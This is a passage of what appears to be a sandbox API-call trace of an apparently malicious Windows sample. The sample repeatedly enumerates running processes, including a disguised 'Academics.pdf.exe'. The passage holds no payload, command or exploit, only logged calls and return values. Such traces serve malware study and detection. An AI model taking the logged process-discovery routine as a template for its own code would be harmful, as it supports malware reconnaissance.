cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0292.745] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0292.746] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0292.747] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0292.748] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.748] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.749] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.749] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.750] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0292.751] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.751] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0292.752] CloseHandle (hObject=0x294) returned 1 [0292.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0292.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0292.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0292.752] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0292.752] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0292.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.752] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0292.754] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.755] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.755] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.756] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.756] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.760] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.761] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.762] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.762] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.763] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.764] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.765] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.766] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.767] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.768] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.768] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.770] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.771] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.772] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.773] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.774] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.774] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.775] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.776] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0292.777] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0292.777] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0292.778] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0292.779] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0292.779] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0292.780] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0292.781] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0292.781] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0292.782] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0292.783] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0292.783] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0292.784] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0292.785] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0292.786] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0292.787] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0292.788] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0292.789] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0292.789] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0292.790] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.791] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.792] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.793] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.794] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0292.794] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.795] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0292.796] CloseHandle (hObject=0x294) returned 1 [0292.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0292.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0292.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0292.797] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0292.797] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0292.799] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.800] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.801] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.802] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.802] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.803] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.804] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.805] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.806] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.807] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.808] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.809] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.809] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.810] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.811] Process32NextW (in: 